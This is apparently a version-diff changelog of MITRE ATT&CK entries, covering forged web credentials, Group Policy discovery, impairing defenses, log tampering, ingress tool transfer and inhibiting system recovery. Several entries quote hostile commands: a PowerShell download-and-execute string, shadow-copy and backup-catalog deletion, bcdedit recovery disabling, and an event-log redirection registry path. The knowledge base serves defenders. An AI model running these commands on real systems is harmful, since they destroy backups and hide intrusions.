descriptionAdversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies, tokens, or other materials to authenticate and authorize user access. Adversaries may generate these credential materials in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539), [Steal Application Access Token](https://attack.mitre.org/techniques/T1528), and other similar behaviors in that the credentials are new and forged by the adversary, rather than stolen or intercepted from legitimate users. The generation of web credentials often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values.(Citation: GitHub AWS-ADFS-Credential-Generator) Once forged, adversaries may use these web credentials to access resources (ex: [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)(Citation: Microsoft SolarWinds Customer Guidance)Adversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies, tokens, or other materials to authenticate and authorize user access. Adversaries may generate these credential materials in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539), [Steal Application Access Token](https://attack.mitre.org/techniques/T1528), and other similar behaviors in that the credentials are new and forged by the adversary, rather than stolen or intercepted from legitimate users. The generation of web credentials often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values.(Citation: GitHub AWS-ADFS-Credential-Generator) Adversaries may also forge tokens by taking advantage of features such as the `AssumeRole` and `GetFederationToken` APIs in AWS, which allow users to request temporary security credentials.(Citation: AWS Temporary Security Credentials) Once forged, adversaries may use these web credentials to access resources (ex: [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)(Citation: Microsoft SolarWinds Customer Guidance)
external_references[1]['source_name']GitHub AWS-ADFS-Credential-GeneratorAWS Temporary Security Credentials
external_references[1]['description']Damian Hickey. (2017, January 28). AWS-ADFS-Credential-Generator. Retrieved December 16, 2020.AWS. (n.d.). Requesting temporary security credentials. Retrieved April 1, 2022.
external_references[1]['url']https://github.com/damianh/aws-adfs-credential-generatorhttps://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp_request.html
external_references[2]['source_name']Pass The CookieUnit 42 Mac Crypto Cookies January 2019
external_references[2]['description']Rehberger, J. (2018, December). Pivot to the Cloud using Pass the Cookie. Retrieved April 5, 2019.Chen, Y., Hu, W., Xu, Z., et. al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges’ Cookies. Retrieved October 14, 2019.
external_references[2]['url']https://wunderwuzzi23.github.io/blog/passthecookie.htmlhttps://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/
external_references[3]['source_name']Unit 42 Mac Crypto Cookies January 2019GitHub AWS-ADFS-Credential-Generator
external_references[3]['description']Chen, Y., Hu, W., Xu, Z., et. al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges’ Cookies. Retrieved October 14, 2019.Damian Hickey. (2017, January 28). AWS-ADFS-Credential-Generator. Retrieved December 16, 2020.
external_references[3]['url']https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/https://github.com/damianh/aws-adfs-credential-generator
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Pass The Cookie', 'description': 'Rehberger, J. (2018, December). Pivot to the Cloud using Pass the Cookie. Retrieved April 5, 2019.', 'url': 'https://wunderwuzzi23.github.io/blog/passthecookie.html'}
x_mitre_data_sourcesLogon Session: Logon Session Creation
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesLogon Session: Logon Session Creation

[T1615] Group Policy Discovery

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may gather information on Group Policy settings t1Adversaries may gather information on Group Policy settings 
>to identify paths for privilege escalation, security measure>to identify paths for privilege escalation, security measure
>s applied within a domain, and to discover patterns in domai>s applied within a domain, and to discover patterns in domai
>n objects that can be manipulated or used to blend in the en>n objects that can be manipulated or used to blend in the en
>vironment. Group Policy allows for centralized management of>vironment. Group Policy allows for centralized management of
> user and computer settings in Active Directory (AD). Group > user and computer settings in Active Directory (AD). Group 
>policy objects (GPOs) are containers for group policy settin>policy objects (GPOs) are containers for group policy settin
>gs made up of files stored within a predicable network path >gs made up of files stored within a predictable network path
><code>\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\</code>.(Citation: > `\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\`.(Citation: TechNet Gr
>TechNet Group Policy Basics)(Citation: ADSecurity GPO Persis>oup Policy Basics)(Citation: ADSecurity GPO Persistence 2016
>tence 2016)  Adversaries may use commands such as <code>gpre>)  Adversaries may use commands such as <code>gpresult</code
>sult</code> or various publicly available PowerShell functio>> or various publicly available PowerShell functions, such a
>ns, such as <code>Get-DomainGPO</code> and <code>Get-DomainG>s <code>Get-DomainGPO</code> and <code>Get-DomainGPOLocalGro
>POLocalGroup</code>, to gather information on Group Policy s>up</code>, to gather information on Group Policy settings.(C
>ettings.(Citation: Microsoft gpresult)(Citation: Github Powe>itation: Microsoft gpresult)(Citation: Github PowerShell Emp
>rShell Empire) Adversaries may use this information to shape>ire) Adversaries may use this information to shape follow-on
> follow-on behaviors, including determining potential attack> behaviors, including determining potential attack paths wit
> paths within the target network as well as opportunities to>hin the target network as well as opportunities to manipulat
> manipulate Group Policy settings (i.e. [Domain Policy Modif>e Group Policy settings (i.e. [Domain Policy Modification](h
>ication](https://attack.mitre.org/techniques/T1484)) for the>ttps://attack.mitre.org/techniques/T1484)) for their benefit
>ir benefit.>.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 23:16:28.296000+00:002023-01-06 12:41:08.579000+00:00
descriptionAdversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predicable network path \\SYSVOL\\Policies\.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) Adversaries may use commands such as gpresult or various publicly available PowerShell functions, such as Get-DomainGPO and Get-DomainGPOLocalGroup, to gather information on Group Policy settings.(Citation: Microsoft gpresult)(Citation: Github PowerShell Empire) Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. [Domain Policy Modification](https://attack.mitre.org/techniques/T1484)) for their benefit.Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\\SYSVOL\\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) Adversaries may use commands such as gpresult or various publicly available PowerShell functions, such as Get-DomainGPO and Get-DomainGPOLocalGroup, to gather information on Group Policy settings.(Citation: Microsoft gpresult)(Citation: Github PowerShell Empire) Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. [Domain Policy Modification](https://attack.mitre.org/techniques/T1484)) for their benefit.
external_references[1]['source_name']TechNet Group Policy BasicsADSecurity GPO Persistence 2016
external_references[1]['description']srachui. (2012, February 13). Group Policy Basics – Part 1: Understanding the Structure of a Group Policy Object. Retrieved March 5, 2019.Metcalf, S. (2016, March 14). Sneaky Active Directory Persistence #17: Group Policy. Retrieved March 5, 2019.
external_references[1]['url']https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/https://adsecurity.org/?p=2716
external_references[2]['source_name']ADSecurity GPO Persistence 2016Microsoft gpresult
external_references[2]['description']Metcalf, S. (2016, March 14). Sneaky Active Directory Persistence #17: Group Policy. Retrieved March 5, 2019.Microsoft. (2017, October 16). gpresult. Retrieved August 6, 2021.
external_references[2]['url']https://adsecurity.org/?p=2716https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult
external_references[3]['source_name']Microsoft gpresultGithub PowerShell Empire
external_references[3]['description']Microsoft. (2017, October 16). gpresult. Retrieved August 6, 2021.Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016.
external_references[3]['url']https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresulthttps://github.com/PowerShellEmpire/Empire
external_references[4]['source_name']Github PowerShell EmpireTechNet Group Policy Basics
external_references[4]['description']Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016.srachui. (2012, February 13). Group Policy Basics – Part 1: Understanding the Structure of a Group Policy Object. Retrieved March 5, 2019.
external_references[4]['url']https://github.com/PowerShellEmpire/Empirehttps://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
x_mitre_data_sources[0]Network Traffic: Network Traffic ContentActive Directory: Active Directory Object Access
x_mitre_data_sources[1]Command: Command ExecutionScript: Script Execution
x_mitre_data_sources[2]Script: Script ExecutionProcess: Process Creation
x_mitre_data_sources[3]Process: Process CreationNetwork Traffic: Network Traffic Content
x_mitre_data_sources[4]Active Directory: Active Directory Object AccessCommand: Command Execution
x_mitre_version1.01.1

[T1562] Impair Defenses

Current version: 1.4

Version changed from: 1.3 → 1.4


Old Description
New Description
t1Adversaries may maliciously modify components of a victim ent1Adversaries may maliciously modify components of a victim en
>vironment in order to hinder or disable defensive mechanisms>vironment in order to hinder or disable defensive mechanisms
>. This not only involves impairing preventative defenses, su>. This not only involves impairing preventative defenses, su
>ch as firewalls and anti-virus, but also detection capabilit>ch as firewalls and anti-virus, but also detection capabilit
>ies that defenders can use to audit activity and identify ma>ies that defenders can use to audit activity and identify ma
>licious behavior. This may also span both native defenses as>licious behavior. This may also span both native defenses as
> well as supplemental capabilities installed by users and ad> well as supplemental capabilities installed by users and ad
>ministrators.  Adversaries could also target event aggregati>ministrators.  Adversaries may also impair routine operation
>on and analysis mechanisms, or otherwise disrupt these proce>s that contribute to defensive hygiene, such as blocking use
>dures by altering other system components.>rs from logging out of a computer or stopping it from being 
 >shut down. These restrictions can further enable malicious o
 >perations as well as the continued propagation of incidents.
 >(Citation: Emotet shutdown)  Adversaries could also target e
 >vent aggregation and analysis mechanisms, or otherwise disru
 >pt these procedures by altering other system components.

New Mitigations:

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-19 16:32:56.502000+00:002023-04-15 00:48:46.626000+00:00
descriptionAdversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators. Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Emotet shutdown) Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]Cloud Service: Cloud Service ModificationFirewall: Firewall Rule Modification
x_mitre_data_sources[1]Firewall: Firewall Rule ModificationCloud Service: Cloud Service Disable
x_mitre_data_sources[2]Process: Process TerminationCommand: Command Execution
x_mitre_data_sources[3]Service: Service MetadataUser Account: User Account Modification
x_mitre_data_sources[4]Process: Process CreationCloud Service: Cloud Service Modification
x_mitre_data_sources[5]Driver: Driver LoadFirewall: Firewall Disable
x_mitre_data_sources[6]Firewall: Firewall DisableScript: Script Execution
x_mitre_data_sources[7]Command: Command ExecutionDriver: Driver Load
x_mitre_data_sources[8]Cloud Service: Cloud Service DisableWindows Registry: Windows Registry Key Modification
x_mitre_data_sources[9]Windows Registry: Windows Registry Key DeletionSensor Health: Host Status
x_mitre_data_sources[10]Windows Registry: Windows Registry Key ModificationWindows Registry: Windows Registry Key Deletion
x_mitre_data_sources[11]Sensor Health: Host StatusProcess: Process Termination
x_mitre_data_sources[12]Script: Script ExecutionProcess: Process Creation
x_mitre_version1.31.4
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Emotet shutdown', 'description': 'The DFIR Report. (2022, November 8). Emotet Strikes Again – LNK File Leads to Domain Wide Ransomware. Retrieved March 6, 2023.', 'url': 'https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/#:~:text=Don’t%20Sleep%20has%20the%20capability%20to%20keep%20the%20computer%20from%20being%20shutdown%20and%20the%20user%20from%20being%20signed%20off.%20This%20was%20likely%20done%20to%20ensure%20nothing%20will%20interfere%20with%20the%20propagation%20of%20the%20ransomware%20payload'}
x_mitre_data_sourcesService: Service Metadata

[T1562.006] Impair Defenses: Indicator Blocking

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1An adversary may attempt to block indicators or events typict1An adversary may attempt to block indicators or events typic
>ally captured by sensors from being gathered and analyzed. T>ally captured by sensors from being gathered and analyzed. T
>his could include maliciously redirecting (Citation: Microso>his could include maliciously redirecting(Citation: Microsof
>ft Lamin Sept 2017) or even disabling host-based sensors, su>t Lamin Sept 2017) or even disabling host-based sensors, suc
>ch as Event Tracing for Windows (ETW),(Citation: Microsoft A>h as Event Tracing for Windows (ETW)(Citation: Microsoft Abo
>bout Event Tracing 2018) by tampering settings that control >ut Event Tracing 2018), by tampering settings that control t
>the collection and flow of event telemetry. (Citation: Mediu>he collection and flow of event telemetry.(Citation: Medium 
>m Event Tracing Tampering 2018) These settings may be stored>Event Tracing Tampering 2018) These settings may be stored o
> on the system in configuration files and/or in the Registry>n the system in configuration files and/or in the Registry a
> as well as being accessible via administrative utilities su>s well as being accessible via administrative utilities such
>ch as [PowerShell](https://attack.mitre.org/techniques/T1059> as [PowerShell](https://attack.mitre.org/techniques/T1059/0
>/001) or [Windows Management Instrumentation](https://attack>01) or [Windows Management Instrumentation](https://attack.m
>.mitre.org/techniques/T1047).  ETW interruption can be achie>itre.org/techniques/T1047).  For example, adversaries may mo
>ved multiple ways, however most directly by defining conditi>dify the `File` value in <code>HKEY_LOCAL_MACHINE\SYSTEM\Cur
>ons using the [PowerShell](https://attack.mitre.org/techniqu>rentControlSet\Services\EventLog\Security</code> to hide the
>es/T1059/001) <code>Set-EtwTraceProvider</code> cmdlet or by>ir malicious actions in a new or different .evtx log file. T
> interfacing directly with the Registry to make alterations.>his action does not require a system reboot and takes effect
>  In the case of network-based reporting of indicators, an a> immediately.(Citation: disable_win_evt_logging)   ETW inter
>dversary may block traffic associated with reporting to prev>ruption can be achieved multiple ways, however most directly
>ent central analysis. This may be accomplished by many means> by defining conditions using the [PowerShell](https://attac
>, such as stopping a local process responsible for forwardin>k.mitre.org/techniques/T1059/001) <code>Set-EtwTraceProvider
>g telemetry and/or creating a host-based firewall rule to bl></code> cmdlet or by interfacing directly with the Registry 
>ock traffic to specific hosts responsible for aggregating ev>to make alterations.  In the case of network-based reporting
>ents, such as security information and event management (SIE> of indicators, an adversary may block traffic associated wi
>M) products.  In Linux environments, adversaries may disable>th reporting to prevent central analysis. This may be accomp
> or reconfigure log processing tools such as syslog or nxlog>lished by many means, such as stopping a local process respo
> to inhibit detection and monitoring capabilities to facilit>nsible for forwarding telemetry and/or creating a host-based
>ate follow on behaviors (Citation: LemonDuck).> firewall rule to block traffic to specific hosts responsibl
 >e for aggregating events, such as security information and e
 >vent management (SIEM) products.  In Linux environments, adv
 >ersaries may disable or reconfigure log processing tools suc
 >h as syslog or nxlog to inhibit detection and monitoring cap
 >abilities to facilitate follow on behaviors (Citation: Lemon
 >Duck).
Details
dictionary_item_added
STIX FieldOld valueNew Value
external_referencesPalantir. (2018, December 24). Tampering with Windows Event Tracing: Background, Offense, and Defense. Retrieved June 7, 2019.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-571
values_changed
STIX FieldOld valueNew Value
modified2022-06-30 16:44:16.962000+00:002023-04-12 15:25:10.496000+00:00
descriptionAn adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) Set-EtwTraceProvider cmdlet or by interfacing directly with the Registry to make alterations. In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products. In Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities to facilitate follow on behaviors (Citation: LemonDuck).An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting(Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW)(Citation: Microsoft About Event Tracing 2018), by tampering settings that control the collection and flow of event telemetry.(Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). For example, adversaries may modify the `File` value in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security to hide their malicious actions in a new or different .evtx log file. This action does not require a system reboot and takes effect immediately.(Citation: disable_win_evt_logging) ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) Set-EtwTraceProvider cmdlet or by interfacing directly with the Registry to make alterations. In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products. In Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities to facilitate follow on behaviors (Citation: LemonDuck).
external_references[1]['source_name']LemonDuckdisable_win_evt_logging
external_references[1]['description']Manoj Ahuje. (2022, April 21). LemonDuck Targets Docker for Cryptomining Operations. Retrieved June 30, 2022.Heiligenstein, L. (n.d.). REP-25: Disable Windows Event Logging. Retrieved April 7, 2022.
external_references[1]['url']https://www.crowdstrike.com/blog/lemonduck-botnet-targets-docker-for-cryptomining-operations/https://ptylu.github.io/content/report/report.html?report=25
external_references[2]['source_name']Microsoft Lamin Sept 2017LemonDuck
external_references[2]['description']Microsoft. (2009, May 17). Backdoor:Win32/Lamin.A. Retrieved September 6, 2018.Manoj Ahuje. (2022, April 21). LemonDuck Targets Docker for Cryptomining Operations. Retrieved June 30, 2022.
external_references[2]['url']https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Backdoor:Win32/Lamin.Ahttps://www.crowdstrike.com/blog/lemonduck-botnet-targets-docker-for-cryptomining-operations/
external_references[3]['source_name']Microsoft About Event Tracing 2018Microsoft Lamin Sept 2017
external_references[3]['description']Microsoft. (2018, May 30). About Event Tracing. Retrieved June 7, 2019.Microsoft. (2009, May 17). Backdoor:Win32/Lamin.A. Retrieved September 6, 2018.
external_references[3]['url']https://docs.microsoft.com/en-us/windows/desktop/etw/consuming-eventshttps://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Backdoor:Win32/Lamin.A
external_references[4]['source_name']Medium Event Tracing Tampering 2018Microsoft About Event Tracing 2018
external_references[4]['description']Palantir. (2018, December 24). Tampering with Windows Event Tracing: Background, Offense, and Defense. Retrieved June 7, 2019.Microsoft. (2018, May 30). About Event Tracing. Retrieved June 7, 2019.
external_references[4]['url']https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63https://docs.microsoft.com/en-us/windows/desktop/etw/consuming-events
external_references[5]['source_name']capecMedium Event Tracing Tampering 2018
external_references[5]['url']https://capec.mitre.org/data/definitions/571.htmlhttps://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsLucas Heiligenstein
x_mitre_data_sourcesWindows Registry: Windows Registry Key Modification
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesWindows Registry: Windows Registry Key Modification

[T1070] Indicator Removal

Current version: 2.1

Version changed from: 2.0 → 2.1

Dropped Mitigations:

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-21 16:12:54.457000+00:002023-04-11 22:27:54.003000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[1]Network Traffic: Network Traffic ContentFile: File Modification
x_mitre_data_sources[2]File: File ModificationWindows Registry: Windows Registry Key Deletion
x_mitre_data_sources[3]File: File DeletionWindows Registry: Windows Registry Key Modification
x_mitre_data_sources[4]Command: Command ExecutionUser Account: User Account Deletion
x_mitre_data_sources[5]Windows Registry: Windows Registry Key ModificationFile: File Metadata
x_mitre_data_sources[6]File: File MetadataUser Account: User Account Authentication
x_mitre_data_sources[8]Scheduled Job: Scheduled Job ModificationCommand: Command Execution
x_mitre_data_sources[10]Windows Registry: Windows Registry Key DeletionScheduled Job: Scheduled Job Modification
x_mitre_data_sources[11]User Account: User Account AuthenticationNetwork Traffic: Network Traffic Content
x_mitre_version2.02.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesApplication Log: Application Log Content
x_mitre_data_sourcesFile: File Deletion
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/93.html', 'external_id': 'CAPEC-93'}

[T1105] Ingress Tool Transfer

Current version: 2.2

Version changed from: 2.1 → 2.2


Old Description
New Description
t1Adversaries may transfer tools or other files from an externt1Adversaries may transfer tools or other files from an extern
>al system into a compromised environment. Tools or files may>al system into a compromised environment. Tools or files may
> be copied from an external adversary-controlled system to t> be copied from an external adversary-controlled system to t
>he victim network through the command and control channel or>he victim network through the command and control channel or
> through alternate protocols such as [ftp](https://attack.mi> through alternate protocols such as [ftp](https://attack.mi
>tre.org/software/S0095). Once present, adversaries may also >tre.org/software/S0095). Once present, adversaries may also 
>transfer/spread tools between victim devices within a compro>transfer/spread tools between victim devices within a compro
>mised environment (i.e. [Lateral Tool Transfer](https://atta>mised environment (i.e. [Lateral Tool Transfer](https://atta
>ck.mitre.org/techniques/T1570)).   Files can also be transfe>ck.mitre.org/techniques/T1570)).   Files can also be transfe
>rred using various [Web Service](https://attack.mitre.org/te>rred using various [Web Service](https://attack.mitre.org/te
>chniques/T1102)s as well as native or otherwise present tool>chniques/T1102)s as well as native or otherwise present tool
>s on the victim system.(Citation: PTSecurity Cobalt Dec 2016>s on the victim system.(Citation: PTSecurity Cobalt Dec 2016
>)  On Windows, adversaries may use various utilities to down>)  On Windows, adversaries may use various utilities to down
>load tools, such as `copy`, `finger`, and [PowerShell](https>load tools, such as `copy`, `finger`, [certutil](https://att
>://attack.mitre.org/techniques/T1059/001) commands such as <>ack.mitre.org/software/S0160), and [PowerShell](https://atta
>code>IEX(New-Object Net.WebClient).downloadString()</code> a>ck.mitre.org/techniques/T1059/001) commands such as <code>IE
>nd <code>Invoke-WebRequest</code>. On Linux and macOS system>X(New-Object Net.WebClient).downloadString()</code> and <cod
>s, a variety of utilities also exist, such as `curl`, `scp`,>e>Invoke-WebRequest</code>. On Linux and macOS systems, a va
> `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1>riety of utilities also exist, such as `curl`, `scp`, `sftp`
>105_lolbas)>, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lol
 >bas)

Dropped Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-05-20 17:38:35.985000+00:002023-04-14 19:27:57.370000+00:00
descriptionAdversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). Files can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) On Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). Files can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) On Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.12.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsMark Wee
x_mitre_data_sourcesNetwork Traffic: Network Connection Creation
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork Traffic: Network Connection Creation

[T1490] Inhibit System Recovery

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may delete or remove built-in operating system dt1Adversaries may delete or remove built-in data and turn off 
>ata and turn off services designed to aid in the recovery of>services designed to aid in the recovery of a corrupted syst
> a corrupted system to prevent recovery.(Citation: Talos Oly>em to prevent recovery.(Citation: Talos Olympic Destroyer 20
>mpic Destroyer 2018)(Citation: FireEye WannaCry 2017) This m>18)(Citation: FireEye WannaCry 2017) This may deny access to
>ay deny access to available backups and recovery options.  O> available backups and recovery options.  Operating systems 
>perating systems may contain features that can help fix corr>may contain features that can help fix corrupted systems, su
>upted systems, such as a backup catalog, volume shadow copie>ch as a backup catalog, volume shadow copies, and automatic 
>s, and automatic repair features. Adversaries may disable or>repair features. Adversaries may disable or delete system re
> delete system recovery features to augment the effects of [>covery features to augment the effects of [Data Destruction]
>Data Destruction](https://attack.mitre.org/techniques/T1485)>(https://attack.mitre.org/techniques/T1485) and [Data Encryp
> and [Data Encrypted for Impact](https://attack.mitre.org/te>ted for Impact](https://attack.mitre.org/techniques/T1486).(
>chniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Cit>Citation: Talos Olympic Destroyer 2018)(Citation: FireEye Wa
>ation: FireEye WannaCry 2017)  A number of native Windows ut>nnaCry 2017) Furthermore, adversaries may disable recovery n
>ilities have been used by adversaries to disable or delete s>otifications, then corrupt backups.(Citation: disable_notif_
>ystem recovery features:  * <code>vssadmin.exe</code> can be>synology_ransom)  A number of native Windows utilities have 
> used to delete all volume shadow copies on a system - <code>been used by adversaries to disable or delete system recover
>>vssadmin.exe delete shadows /all /quiet</code> * [Windows M>y features:  * <code>vssadmin.exe</code> can be used to dele
>anagement Instrumentation](https://attack.mitre.org/techniqu>te all volume shadow copies on a system - <code>vssadmin.exe
>es/T1047) can be used to delete volume shadow copies - <code> delete shadows /all /quiet</code> * [Windows Management Ins
>>wmic shadowcopy delete</code> * <code>wbadmin.exe</code> ca>trumentation](https://attack.mitre.org/techniques/T1047) can
>n be used to delete the Windows Backup Catalog - <code>wbadm> be used to delete volume shadow copies - <code>wmic shadowc
>in.exe delete catalog -quiet</code> * <code>bcdedit.exe</cod>opy delete</code> * <code>wbadmin.exe</code> can be used to 
>e> can be used to disable automatic Windows recovery feature>delete the Windows Backup Catalog - <code>wbadmin.exe delete
>s by modifying boot configuration data - <code>bcdedit.exe /> catalog -quiet</code> * <code>bcdedit.exe</code> can be use
>set {default} bootstatuspolicy ignoreallfailures & bcdedit />d to disable automatic Windows recovery features by modifyin
